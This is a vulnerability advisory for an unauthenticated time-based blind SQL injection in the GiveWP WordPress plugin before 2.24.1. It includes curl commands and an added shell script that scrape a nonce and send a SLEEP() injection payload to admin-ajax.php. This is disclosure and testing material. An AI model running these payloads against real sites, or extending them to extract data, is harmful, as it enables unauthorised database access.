WordPress Plugin Vulnerabilities

GiveWP < 2.24.1 - Unauthenticated SQLi

Description

The plugin does not properly escape user input before using it in SQL queries, which could allow unauthenticated attackers to perform SQL Injection attacks. The injectable value reaches the query through the donor-wall AJAX action (`give_get_donor_comments` on `admin-ajax.php`), which requires only a nonce that the Donor Wall block prints into the public page; no login is needed. The injection is blind, so the proof of concept below confirms it by the delay a `SLEEP()` call adds to the response.

Proof of Concept

1) Create a post/page that contains the "Donor Wall" block.

2) Using the default donation form, send a test donation (the donor wall only renders, and only embeds its nonce, once it has at least one donation to show).

3) In a terminal, edit and run the following command, and copy the nonce it prints:
   curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"'

4) Still in the terminal, edit and run the following command, replacing the nonce value (c734a76f44 below is only a placeholder) with the one from step 3. The `data` parameter decodes to `form_id=') UNION (SELECT SLEEP(5))#`; if the site is vulnerable, the response is delayed by about 5 seconds:
   curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23'

Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1).
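The four steps above, automated as a single POSIX shell script. This is an added example, not part of the original advisory and not code from GiveWP or the researcher: it extracts the nonce from the donor-wall page, builds the same `form_id` payload as step 4, and decides "vulnerable" by measuring whether `admin-ajax.php` takes at least as long as the injected `SLEEP()`. `TARGET` and `DONOR_WALL_PATH` are placeholders for a site you are authorised to test; the script only touches the network when invoked with the argument `run`.

```shell
#!/bin/sh
# Added example (not from the advisory or GiveWP): automate the PoC steps as a
# time-based blind SQLi check. TARGET and DONOR_WALL_PATH are placeholders.
TARGET="${TARGET:-http://vulnerable-site.tld}"
DONOR_WALL_PATH="${DONOR_WALL_PATH:-/donor-wall-post-we-created-earlier/}"
SLEEP_SECONDS=5

# Step 3: read the page HTML on stdin and print the first data-nonce value.
extract_nonce() {
    grep -o 'data-nonce="[a-f0-9]*"' | head -n 1 | sed 's/data-nonce="\(.*\)"/\1/'
}

# Step 4: build the form-encoded POST body. The data= value is the
# URL-encoding of   form_id=') UNION (SELECT SLEEP(N))#
# which closes the open quote and parenthesis, appends a SLEEP() and
# comments out whatever followed in the original query.
build_body() {
    nonce="$1"
    seconds="$2"
    printf 'action=give_get_donor_comments&nonce=%s&data=form_id%%3D%%27%%29%%20UNION%%20%%28SELECT%%20SLEEP%%28%s%%29%%29%%23' \
        "$nonce" "$seconds"
}

# The injection is blind: the only observable is latency. Treat the site as
# vulnerable when the request took at least the injected SLEEP() duration.
# POSIX sh has no float arithmetic, so compare whole seconds only.
elapsed_indicates_sqli() {
    elapsed="$1"
    threshold="$2"
    [ "${elapsed%.*}" -ge "$threshold" ]
}

run_poc() {
    nonce=$(curl -s --url "$TARGET$DONOR_WALL_PATH" | extract_nonce)
    [ -n "$nonce" ] || {
        echo "no data-nonce found; is the Donor Wall block on that page with a donation?" >&2
        return 2
    }
    body=$(build_body "$nonce" "$SLEEP_SECONDS")
    # -w '%{time_total}' prints curl's own measurement of the request time.
    elapsed=$(curl -s -o /dev/null -w '%{time_total}' \
        --url "$TARGET/wp-admin/admin-ajax.php" -X POST --data-raw "$body")
    if elapsed_indicates_sqli "$elapsed" "$SLEEP_SECONDS"; then
        echo "vulnerable: admin-ajax.php took ${elapsed}s (>= ${SLEEP_SECONDS}s)"
    else
        echo "not vulnerable or patched: admin-ajax.php took ${elapsed}s"
    fi
}

if [ "${1:-}" = "run" ]; then
    run_poc
fi
```

A single slow response is weak evidence on a loaded host; repeat the request with two different `SLEEP()` values (for example 5 and 10) and check that the delay tracks the value before calling the site vulnerable.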

Affects Plugins

Fixed in 2.24.1

Classification

Type
SQLI

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2023-01-19
Added
2023-01-20
Last Updated
2023-01-20